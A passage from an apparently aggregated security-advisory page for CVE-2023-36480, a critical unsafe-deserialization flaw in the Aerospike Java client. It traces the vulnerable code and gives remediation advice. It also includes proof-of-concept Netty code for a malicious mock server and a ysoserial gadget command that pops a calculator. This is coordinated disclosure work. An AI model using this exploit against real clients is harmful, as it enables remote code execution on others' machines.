        return true;
    }

It can be seen that several fields are read from the message's bytes, and then a call to Command.parseRecord happens:

client/src/com/aerospike/client/command/Command.java:2083

protected final Record parseRecord(
    int opCount,
    int generation,
    int expiration,
    boolean isOperation
)  {
    Map<String,Object> bins = new LinkedHashMap<>();

    for (int i = 0 ; i < opCount; i++) {
        int opSize = Buffer.bytesToInt(dataBuffer, dataOffset);
        byte particleType = dataBuffer[dataOffset + 5];
        byte nameSize = dataBuffer[dataOffset + 7];
        String name = Buffer.utf8ToString(dataBuffer, dataOffset + 8, nameSize);
        dataOffset += 4 + 4 + nameSize;

        int particleBytesSize = opSize - (4 + nameSize);
        Object value = Buffer.bytesToParticle(particleType, dataBuffer, dataOffset, particleBytesSize);

Buffer.bytesToParticle converts the remaining bytes in the data buffer depending on the particleType field. We're interested in the JBLOB case:

client/src/com/aerospike/client/command/Buffer.java:53

public static Object bytesToParticle(int type, byte[] buf, int offset, int len)
    throws AerospikeException {
        switch (type) {
            // --snip--
            case ParticleType.JBLOB:
                return Buffer.bytesToObject(buf, offset, len);

In bytesToObject, the deserialization of an object from the message bytes happens:

client/src/com/aerospike/client/command/Buffer.java:300

public static Object bytesToObject(byte[] buf, int offset, int length) {
    // --snip--
    try (ByteArrayInputStream bastream = new ByteArrayInputStream(buf, offset, length)) {
        try (ObjectInputStream oistream = new ObjectInputStream(bastream)) {
            return oistream.readObject();
        }
    }
    // --snip--
}

NOTE: Take into account that there exists a similar sink, that can be reached in a similar way, in Unpacker.unpackBlock:

client/src/com/aerospike/client/util/Unpacker.java:227

private T unpackBlob(int count) throws IOException, ClassNotFoundException {
    // --snip--
    case ParticleType.JBLOB:
        // --snip--
        try (ByteArrayInputStream bastream = new ByteArrayInputStream(buffer, offset, count)) {
            try (ObjectInputStream oistream = new ObjectInputStream(bastream)) {
                val = getJavaBlob(oistream.readObject());
            }
        }

This vulnerability was discovered with the help of CodeQL.

Impact

This issue may lead to Remote Code Execution (RCE) in the Java client.

Remediation

Avoid deserialization of untrusted data if at all possible. If the architecture permits it then use other formats instead of serialized objects, for example JSON or XML. However, these formats should not be deserialized into complex objects because this provides further opportunities for attack. For example, XML-based deserialization attacks are possible through libraries such as XStream and XmlDecoder.

Alternatively, a tightly controlled whitelist can limit the vulnerability of code but be aware of the existence of so-called Bypass Gadgets, which can circumvent such protection measures.

Resources

To exploit this vulnerability, a malicious Aerospike server is needed. For the sake of simplicity, we implemented a mock server with hardcoded responses, with the only goal of reaching the vulnerable code of the client. To be able to easily reproduce this, we used the client's examples with the -netty flag, specifically the AsyncPutGet, which uses an AsyncRead. The examples point to localhost:3000 by default, so we set up a simple Netty TCP server listening on that port, which replicates responses previously intercepted from a real Aerospike server and returns them to the client, until the AsyncRead command happens. Then, our server injects the malicious response:

public class AttackChannelHandler extends SimpleChannelInboundHandler<String> {

    @Override
    protected void channelRead0(ChannelHandlerContext ctx, String s) throws Exception {
        // --snip--
        if (s.getBytes()[7] == 0x44) {
            AttackMessage m = new AttackMessage(
                    Files.readAllBytes(Paths.get("location/of/deserialization/payload.bin")));
            ctx.channel().writeAndFlush(m);
            return;
        }
        // --snip--
    }
}

AttackMessage is a class that hardcodes the necessary data to deliver the payload:

public class AttackMessage {

    private byte resultCode = 0;
    private int generation = 2;
    private int expiration = 417523457;
    private short fieldCount = 0;
    private short opCount = 1;
    private byte particleType = 7;
    private String name = "putgetbin";
    private byte[] payload;

    public AttackMessage(byte[] payload) {
        this.payload = payload;
    }

    // --snip-- (getters)

    public int[] getSize() {
        int size = 30 + name.length() + payload.length;
        int low = (byte) (size & 0xFF);
        int high = (byte) (size >> 8) & 0xFF;
        return new int[] {high, low};
    }

    public int getOpSize() {
        return payload.length + 4 + name.length();
    }

    public byte[] getPayload() {
        return payload;
    }
}

And it's finally encoded and delivered to the client through the network using a MessageToByteEncoder from Netty:

public class AttackMessageEncoder extends MessageToByteEncoder<AttackMessage> {

    @Override
    protected void encode(ChannelHandlerContext ctx, AttackMessage msg, ByteBuf out)
            throws Exception {
        // header
        out.writeBytes(new byte[] {0x02, 0x03, 0x00, 0x00, 0x00, 0x00});
        int[] length = msg.getSize();
        out.writeByte(length[0]);
        out.writeByte(length[1]);

        out.writeBytes(new byte[] {0x16, 0x00, 0x00, 0x00, 0x00});
        out.writeByte(msg.getResultCode());
        out.writeInt(msg.getGeneration());
        out.writeInt(msg.getExpiration());

        out.writeBytes(new byte[] {0x00, 0x00, 0x00, 0x00});
        out.writeShort(msg.getFieldCount());
        out.writeShort(msg.getOpCount());
        out.writeInt(msg.getOpSize());

        out.writeByte(0x01);
        out.writeByte(msg.getParticleType());

        out.writeByte(0x00);
        out.writeByte(msg.getName().length());
        out.writeCharSequence(msg.getName(), Charset.defaultCharset());
        out.writeBytes(msg.getPayload());
    }

}

The specific deserialization payload that needs to be used depends on the deserialization gadgets available in the classpath of the application using the Aerospike client. Again, for simplicity, we assumed the victim application uses Apache Commons Collections 4.0, which contains a well-known deserialization gadget:

<dependency>
  <groupId>org.apache.commons</groupId>
  <artifactId>commons-collections4</artifactId>
  <version>4.0</version>
</dependency>

In which case, the malicious payload file could be generated using ysoserial as follows:

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections2 '/System/Applications/Calculator.app/Contents/MacOS/Calculator' > payload.bin

GitHub Security Advisories

We recommend you create a private GitHub Security Advisory for this finding. This also allows you to invite the GHSL team to collaborate and further discuss this finding in private before it is published.

Credit

This issue was discovered and reported by the GitHub CodeQL team members @atorralba (Tony Torralba) and @joefarebrother (Joseph Farebrother).

Contact

You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2023-044 in any communication regarding this issue.

Disclosure Policy

This report is subject to our coordinated disclosure policy.

Severity ?

9.8 (Critical)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "com.aerospike:aerospike-client"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "6.0.0"
            },
            {
              "fixed": "6.2.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "com.aerospike:aerospike-client"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "5.0.0"
            },
            {
              "fixed": "5.2.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "com.aerospike:aerospike-client"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.5.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-36480"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-08-03T19:45:39Z",
    "nvd_published_at": "2023-08-04T15:15:10Z",
    "severity": "CRITICAL"
  },
  "details": "# GitHub Security Lab (GHSL) Vulnerability Report: `GHSL-2023-044`\n\nThe [GitHub Security Lab](https://securitylab.github.com) team has identified a potential security vulnerability in [Aerospike Java Client](https://github.com/aerospike/aerospike-client-java/).\n\nWe are committed to working with you to help resolve this issue. In this report you will find everything you need to effectively coordinate a resolution of this issue with the GHSL team.\n\nIf at any point you have concerns or questions about this process, please do not hesitate to reach out to us at `securitylab@github.com` (please include `GHSL-2023-044` as a reference).\n\nIf you are _NOT_ the correct point of contact for this report, please let us know!\n\n## Summary\n\nThe Aerospike Java client is a Java application that implements a network protocol to communicate with an Aerospike server. Some of the messages received from the server contain Java objects that the client deserializes when it encounters them without further validation. Attackers that manage to trick clients into communicating with a malicious server can include especially crafted objects in its responses that, once deserialized by the client, force it to execute arbitrary code. This can be abused to take control of the machine the client is running on.\n\n## Product\n\nAerospike Java Client\n\n## Tested Version\n\n[6.1.7](https://github.com/aerospike/aerospike-client-java/releases/tag/6.1.7)\n\n## Details\n\n### Issue: Unsafe deserialization of server responses (`GHSL-2023-044`)\n\nThe Aerospike Java client implements different ways of communicating with an Aerospike server to perform several operations. Asynchronous commands can be executed using the Netty framework using the `NettyCommand` class. This class includes an `InboundHandler` that extends Netty\u0027s `ChannelInboundHandlerAdapter`, which handles inbound data coming from the Netty channel established with the server. This is implemented in the `channelRead` method:\n\n[`client/src/com/aerospike/client/async/NettyCommand.java:1157`](https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/NettyCommand.java#L1157)\n\n```java\n@Override\npublic void channelRead(ChannelHandlerContext ctx, Object msg) {\n    command.read((ByteBuf)msg);\n}\n```\n\nThe incoming `msg` object is handled by the `NettyCommand.read` method, which behaves differently depending on the `state` variable. Several states produce paths to the vulnerable code \u2014 for instance, we will follow the path through `AsyncCommand.COMMAND_READ_HEADER`:\n\n[`/client/src/com/aerospike/client/async/NettyCommand.java:489`](https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/NettyCommand.java#L489)\n\n```java\nprivate void read(ByteBuf byteBuffer) {\n    eventReceived = true;\n\n    try {\n        switch (state) {\n            // --snip--\n            case AsyncCommand.COMMAND_READ_HEADER:\n                if (command.isSingle) {\n                    readSingleHeader(byteBuffer);\n                }\n                // --snip--\n        }\n        // --snip--\n    }\n    // --snip---\n}\n```\n\nSome bytes are read from the message buffer and saved in `command.dataBuffer` in the `readSingleHeader` method, after which `parseSingleBody` is called:\n\n[`client/src/com/aerospike/client/async/NettyCommand.java:596`](https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/NettyCommand.java#L596)\n\n```java\nprivate void readSingleHeader(ByteBuf byteBuffer) {\n    int readableBytes = byteBuffer.readableBytes();\n    int dataSize = command.dataOffset + readableBytes;\n\n    // --snip--\n\n    byteBuffer.readBytes(command.dataBuffer, 0, dataSize);\n    command.dataOffset = dataSize;\n\n    if (command.dataOffset \u003e= receiveSize) {\n        parseSingleBody();\n    }\n}\n```\n\n`parseSingleBody` simply delegates on `AsyncCommand.parseCommandResult`, which unless the message is compressed, directly calls `AsyncCommand.parseResult`. The implementation of this method depends on the command type. For an `AsyncRead` command, we have the following:\n\n[`client/src/com/aerospike/client/async/AsyncRead.java:68`](https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/AsyncRead.java#L68)\n\n```java\n@Override\nprotected final boolean parseResult() {\n    validateHeaderSize();\n\n    int resultCode = dataBuffer[dataOffset + 5] \u0026 0xFF;\n    int generation = Buffer.bytesToInt(dataBuffer, dataOffset + 6);\n    int expiration = Buffer.bytesToInt(dataBuffer, dataOffset + 10);\n    int fieldCount = Buffer.bytesToShort(dataBuffer, dataOffset + 18);\n    int opCount = Buffer.bytesToShort(dataBuffer, dataOffset + 20);\n    dataOffset += Command.MSG_REMAINING_HEADER_SIZE;\n\n    if (resultCode == 0) {\n        // --snip--\n        skipKey(fieldCount);\n        record = parseRecord(opCount, generation, expiration, isOperation);\n        return true;\n    }\n```\n\nIt can be seen that several fields are read from the message\u0027s bytes, and then a call to `Command.parseRecord` happens:\n\n[`client/src/com/aerospike/client/command/Command.java:2083`](https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/command/Command.java#L2083)\n\n```java\nprotected final Record parseRecord(\n    int opCount,\n    int generation,\n    int expiration,\n    boolean isOperation\n)  {\n    Map\u003cString,Object\u003e bins = new LinkedHashMap\u003c\u003e();\n\n    for (int i = 0 ; i \u003c opCount; i++) {\n        int opSize = Buffer.bytesToInt(dataBuffer, dataOffset);\n        byte particleType = dataBuffer[dataOffset + 5];\n        byte nameSize = dataBuffer[dataOffset + 7];\n        String name = Buffer.utf8ToString(dataBuffer, dataOffset + 8, nameSize);\n        dataOffset += 4 + 4 + nameSize;\n\n        int particleBytesSize = opSize - (4 + nameSize);\n        Object value = Buffer.bytesToParticle(particleType, dataBuffer, dataOffset, particleBytesSize);\n```\n\n`Buffer.bytesToParticle` converts the remaining bytes in the data buffer depending on the `particleType` field. We\u0027re interested in the `JBLOB` case:\n\n[`client/src/com/aerospike/client/command/Buffer.java:53`](https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/command/Buffer.java#L53)\n\n```java\npublic static Object bytesToParticle(int type, byte[] buf, int offset, int len)\n    throws AerospikeException {\n        switch (type) {\n            // --snip--\n            case ParticleType.JBLOB:\n                return Buffer.bytesToObject(buf, offset, len);\n```\n\nIn `bytesToObject`, the deserialization of an object from the message bytes happens:\n\n[`client/src/com/aerospike/client/command/Buffer.java:300`](https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/command/Buffer.java#L300)\n\n```java\npublic static Object bytesToObject(byte[] buf, int offset, int length) {\n    // --snip--\n    try (ByteArrayInputStream bastream = new ByteArrayInputStream(buf, offset, length)) {\n        try (ObjectInputStream oistream = new ObjectInputStream(bastream)) {\n            return oistream.readObject();\n        }\n    }\n    // --snip--\n}\n```\n\nNOTE: Take into account that there exists a similar sink, that can be reached in a similar way, in `Unpacker.unpackBlock`:\n\n[`client/src/com/aerospike/client/util/Unpacker.java:227`](https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/util/Unpacker.java#L227)\n\n```java\nprivate T unpackBlob(int count) throws IOException, ClassNotFoundException {\n    // --snip--\n    case ParticleType.JBLOB:\n        // --snip--\n        try (ByteArrayInputStream bastream = new ByteArrayInputStream(buffer, offset, count)) {\n            try (ObjectInputStream oistream = new ObjectInputStream(bastream)) {\n                val = getJavaBlob(oistream.readObject());\n            }\n        }\n```\n\nThis vulnerability was discovered with the help of [CodeQL](https://codeql.github.com/).\n\n#### Impact\n\nThis issue may lead to Remote Code Execution (RCE) in the Java client.\n\n#### Remediation\n\nAvoid deserialization of untrusted data if at all possible. If the architecture permits it then use other formats instead of serialized objects, for example JSON or XML.  However, these formats should not be deserialized into complex objects because this provides further opportunities for attack. For example, XML-based deserialization attacks are possible through libraries such as XStream and XmlDecoder.\n\nAlternatively, a tightly controlled whitelist can limit the vulnerability of code but be aware of the existence of so-called Bypass Gadgets, which can circumvent such protection measures.\n\n#### Resources\n\nTo exploit this vulnerability, a malicious Aerospike server is needed. For the sake of simplicity, we implemented a mock server with hardcoded responses, with the only goal of reaching the vulnerable code of the client. To be able to easily reproduce this, we used the client\u0027s examples with the `-netty` flag, specifically the `AsyncPutGet`, which uses an `AsyncRead`. The examples point to `localhost:3000` by default, so we set up a simple Netty TCP server listening on that port, which replicates responses previously intercepted from a real Aerospike server and returns them to the client, until the `AsyncRead` command happens. Then, our server injects the malicious response:\n\n```java\npublic class AttackChannelHandler extends SimpleChannelInboundHandler\u003cString\u003e {\n\n    @Override\n    protected void channelRead0(ChannelHandlerContext ctx, String s) throws Exception {\n        // --snip--\n        if (s.getBytes()[7] == 0x44) {\n            AttackMessage m = new AttackMessage(\n                    Files.readAllBytes(Paths.get(\"location/of/deserialization/payload.bin\")));\n            ctx.channel().writeAndFlush(m);\n            return;\n        }\n        // --snip--\n    }\n}\n```\n\n`AttackMessage` is a class that hardcodes the necessary data to deliver the payload:\n\n```java\npublic class AttackMessage {\n\n    private byte resultCode = 0;\n    private int generation = 2;\n    private int expiration = 417523457;\n    private short fieldCount = 0;\n    private short opCount = 1;\n    private byte particleType = 7;\n    private String name = \"putgetbin\";\n    private byte[] payload;\n\n    public AttackMessage(byte[] payload) {\n        this.payload = payload;\n    }\n\n    // --snip-- (getters)\n\n    public int[] getSize() {\n        int size = 30 + name.length() + payload.length;\n        int low = (byte) (size \u0026 0xFF);\n        int high = (byte) (size \u003e\u003e 8) \u0026 0xFF;\n        return new int[] {high, low};\n    }\n\n    public int getOpSize() {\n        return payload.length + 4 + name.length();\n    }\n\n    public byte[] getPayload() {\n        return payload;\n    }\n}\n```\n\nAnd it\u0027s finally encoded and delivered to the client through the network using a `MessageToByteEncoder` from Netty:\n\n```java\npublic class AttackMessageEncoder extends MessageToByteEncoder\u003cAttackMessage\u003e {\n\n    @Override\n    protected void encode(ChannelHandlerContext ctx, AttackMessage msg, ByteBuf out)\n            throws Exception {\n        // header\n        out.writeBytes(new byte[] {0x02, 0x03, 0x00, 0x00, 0x00, 0x00});\n        int[] length = msg.getSize();\n        out.writeByte(length[0]);\n        out.writeByte(length[1]);\n\n        out.writeBytes(new byte[] {0x16, 0x00, 0x00, 0x00, 0x00});\n        out.writeByte(msg.getResultCode());\n        out.writeInt(msg.getGeneration());\n        out.writeInt(msg.getExpiration());\n\n        out.writeBytes(new byte[] {0x00, 0x00, 0x00, 0x00});\n        out.writeShort(msg.getFieldCount());\n        out.writeShort(msg.getOpCount());\n        out.writeInt(msg.getOpSize());\n\n        out.writeByte(0x01);\n        out.writeByte(msg.getParticleType());\n\n        out.writeByte(0x00);\n        out.writeByte(msg.getName().length());\n        out.writeCharSequence(msg.getName(), Charset.defaultCharset());\n        out.writeBytes(msg.getPayload());\n    }\n\n}\n```\n\nThe specific deserialization payload that needs to be used depends on the deserialization gadgets available in the classpath of the application using the Aerospike client. Again, for simplicity, we assumed the victim application uses Apache Commons Collections 4.0, which contains a well-known deserialization gadget:\n\n```xml\n\u003cdependency\u003e\n  \u003cgroupId\u003eorg.apache.commons\u003c/groupId\u003e\n  \u003cartifactId\u003ecommons-collections4\u003c/artifactId\u003e\n  \u003cversion\u003e4.0\u003c/version\u003e\n\u003c/dependency\u003e\n```\n\nIn which case, the malicious payload file could be generated using [`ysoserial`](https://github.com/frohoff/ysoserial) as follows:\n\n```\njava -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections2 \u0027/System/Applications/Calculator.app/Contents/MacOS/Calculator\u0027 \u003e payload.bin\n```\n\n## GitHub Security Advisories\n\nWe recommend you create a private [GitHub Security Advisory](https://help.github.com/en/github/managing-security-vulnerabilities/creating-a-security-advisory) for this finding. This also allows you to invite the GHSL team to collaborate and further discuss this finding in private before it is [published](https://help.github.com/en/github/managing-security-vulnerabilities/publishing-a-security-advisory).\n\n## Credit\n\nThis issue was discovered and reported by the GitHub CodeQL team members [@atorralba (Tony Torralba)](https://github.com/atorralba) and [@joefarebrother (Joseph Farebrother)](https://github.com/joefarebrother).\n\n## Contact\n\nYou can contact the GHSL team at `securitylab@github.com`, please include a reference to `GHSL-2023-044` in any communication regarding this issue.\n\n## Disclosure Policy\n\nThis report is subject to our [coordinated disclosure policy](https://securitylab.github.com/advisories#policy).",
  "id": "GHSA-jj95-55cr-9597",
  "modified": "2023-08-08T22:15:13Z",
  "published": "2023-08-03T19:45:39Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/aerospike/aerospike-client-java/security/advisories/GHSA-jj95-55cr-9597"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-36480"
    },
    {
      "type": "WEB",
      "url": "https://github.com/aerospike/aerospike-client-java/commit/02bf28e62fb186f004c82c87b219db2fc5b8262a"
    },
    {
      "type": "WEB",
      "url": "https://github.com/aerospike/aerospike-client-java/commit/51c65e32837da29435161a2d9c09bbdc2071ecae"
    },
    {
      "type": "WEB",
      "url": "https://github.com/aerospike/aerospike-client-java/commit/66aafb4cd743cf53baffaeaf69b035f51d2e2e36"
    },
    {
      "type": "WEB",
      "url": "https://github.com/aerospike/aerospike-client-java/commit/80c508cc5ecb0173ce92d7fab8cfab5e77bd9900"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/aerospike/aerospike-client-java"
    },
    {
      "type": "WEB",
      "url": "https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/AsyncRead.java#L68"
    },
    {
      "type": "WEB",
      "url": "https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/NettyCommand.java#L1157"
    },
    {
      "type": "WEB",
      "url": "https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/NettyCommand.java#L489"
    },
    {
      "type": "WEB",
      "url": "https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/NettyCommand.java#L596"
    },
    {
      "type": "WEB",
      "url": "https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/command/Buffer.java#L53"
    },
    {
      "type": "WEB",
      "url": "https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/command/Command.java#L2083"
    },
    {
      "type": "WEB",
      "url": "https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/util/Unpacker.java#L227"
    },
    {
      "type": "WEB",
      "url": "https://support.aerospike.com/s/article/CVE-2023-36480-Aerospike-Java-Client-vulnerable-to-unsafe-deserialization-of-server-responses"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Aerospike Java Client vulnerable to unsafe deserialization of server responses"
}

GSD-2023-36480

Vulnerability from gsd - Updated: 2023-12-13 01:20

Details

Aliases

CVE-2023-36480

Aliases

CVE-2023-36480

JSON

To clipboard

{
  "GSD": {
    "alias": "CVE-2023-36480",
    "id": "GSD-2023-36480"
  },
  "gsd": {
    "metadata": {
      "exploitCode": "unknown",
      "remediation": "unknown",
      "reportConfidence": "confirmed",
      "type": "vulnerability"
    },
    "osvSchema": {
      "aliases": [
        "CVE-2023-36480"
      ],
      "details": "The Aerospike Java client is a Java application that implements a network protocol to communicate with an Aerospike server. Prior to versions 7.0.0, 6.2.0, 5.2.0, and 4.5.0 some of the messages received from the server contain Java objects that the client deserializes when it encounters them without further validation. Attackers that manage to trick clients into communicating with a malicious server can include especially crafted objects in its responses that, once deserialized by the client, force it to execute arbitrary code. This can be abused to take control of the machine the client is running on. Versions 7.0.0, 6.2.0, 5.2.0, and 4.5.0 contain a patch for this issue.",
      "id": "GSD-2023-36480",
      "modified": "2023-12-13T01:20:34.161042Z",
      "schema_version": "1.4.0"
    }
  },
  "namespaces": {
    "cve.org": {
      "CVE_data_meta": {
        "ASSIGNER": "security-advisories@github.com",
        "ID": "CVE-2023-36480",
        "STATE": "PUBLIC"
      },
      "affects": {
        "vendor": {
          "vendor_data": [
            {
              "product": {
                "product_data": [
                  {
                    "product_name": "aerospike-client-java",
                    "version": {
                      "version_data": [
                        {
                          "version_affected": "=",
                          "version_value": "\u003e= 6.0.0, \u003c 6.2.0"
                        },
                        {
                          "version_affected": "=",
                          "version_value": "\u003e= 5.0.0, \u003c 5.2.0"
                        },
                        {
                          "version_affected": "=",
                          "version_value": "\u003c 4.5.0"
                        }
                      ]
                    }
                  }
                ]
              },
              "vendor_name": "aerospike"
            }
          ]
        }
      },
      "data_format": "MITRE",
      "data_type": "CVE",
      "data_version": "4.0",
      "description": {
        "description_data": [
          {
            "lang": "eng",
            "value": "The Aerospike Java client is a Java application that implements a network protocol to communicate with an Aerospike server. Prior to versions 7.0.0, 6.2.0, 5.2.0, and 4.5.0 some of the messages received from the server contain Java objects that the client deserializes when it encounters them without further validation. Attackers that manage to trick clients into communicating with a malicious server can include especially crafted objects in its responses that, once deserialized by the client, force it to execute arbitrary code. This can be abused to take control of the machine the client is running on. Versions 7.0.0, 6.2.0, 5.2.0, and 4.5.0 contain a patch for this issue."
          }
        ]
      },
      "impact": {
        "cvss": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        ]
      },
      "problemtype": {
        "problemtype_data": [
          {
            "description": [
              {
                "cweId": "CWE-502",
                "lang": "eng",
                "value": "CWE-502: Deserialization of Untrusted Data"
              }
            ]
          }
        ]
      },
      "references": {
        "reference_data": [
          {
            "name": "https://github.com/aerospike/aerospike-client-java/security/advisories/GHSA-jj95-55cr-9597",
            "refsource": "MISC",
            "url": "https://github.com/aerospike/aerospike-client-java/security/advisories/GHSA-jj95-55cr-9597"
          },
          {
            "name": "https://github.com/aerospike/aerospike-client-java/commit/02bf28e62fb186f004c82c87b219db2fc5b8262a",
            "refsource": "MISC",
            "url": "https://github.com/aerospike/aerospike-client-java/commit/02bf28e62fb186f004c82c87b219db2fc5b8262a"
          },
          {
            "name": "https://github.com/aerospike/aerospike-client-java/commit/51c65e32837da29435161a2d9c09bbdc2071ecae",
            "refsource": "MISC",
            "url": "https://github.com/aerospike/aerospike-client-java/commit/51c65e32837da29435161a2d9c09bbdc2071ecae"
          },
          {
            "name": "https://github.com/aerospike/aerospike-client-java/commit/66aafb4cd743cf53baffaeaf69b035f51d2e2e36",
            "refsource": "MISC",
            "url": "https://github.com/aerospike/aerospike-client-java/commit/66aafb4cd743cf53baffaeaf69b035f51d2e2e36"
          },
          {
            "name": "https://github.com/aerospike/aerospike-client-java/commit/80c508cc5ecb0173ce92d7fab8cfab5e77bd9900",
            "refsource": "MISC",
            "url": "https://github.com/aerospike/aerospike-client-java/commit/80c508cc5ecb0173ce92d7fab8cfab5e77bd9900"
          },
          {
            "name": "https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/AsyncRead.java#L68",
            "refsource": "MISC",
            "url": "https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/AsyncRead.java#L68"
          },
          {
            "name": "https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/NettyCommand.java#L1157",
            "refsource": "MISC",
            "url": "https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/NettyCommand.java#L1157"
          },
          {
            "name": "https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/NettyCommand.java#L489",
            "refsource": "MISC",
            "url": "https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/NettyCommand.java#L489"
          },
          {
            "name": "https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/NettyCommand.java#L596",
            "refsource": "MISC",
            "url": "https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/NettyCommand.java#L596"
          },
          {
            "name": "https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/command/Buffer.java#L53",
            "refsource": "MISC",
            "url": "https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/command/Buffer.java#L53"
          },
          {
            "name": "https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/command/Command.java#L2083",
            "refsource": "MISC",
            "url": "https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/command/Command.java#L2083"
          },
          {
            "name": "https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/util/Unpacker.java#L227",
            "refsource": "MISC",
            "url": "https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/util/Unpacker.java#L227"
          },
          {
            "name": "https://support.aerospike.com/s/article/CVE-2023-36480-Aerospike-Java-Client-vulnerable-to-unsafe-deserialization-of-server-responses",
            "refsource": "MISC",
            "url": "https://support.aerospike.com/s/article/CVE-2023-36480-Aerospike-Java-Client-vulnerable-to-unsafe-deserialization-of-server-responses"
          }
        ]
      },
      "source": {
        "advisory": "GHSA-jj95-55cr-9597",
        "discovery": "UNKNOWN"
      }
    },
    "nvd.nist.gov": {
      "configurations": {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:aerospike:aerospike_java_client:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "6.2.0",
                "versionStartIncluding": "6.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:aerospike:aerospike_java_client:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "5.2.0",
                "versionStartIncluding": "5.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:aerospike:aerospike_java_client:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.5.0",
                "vulnerable": true
              }
            ],
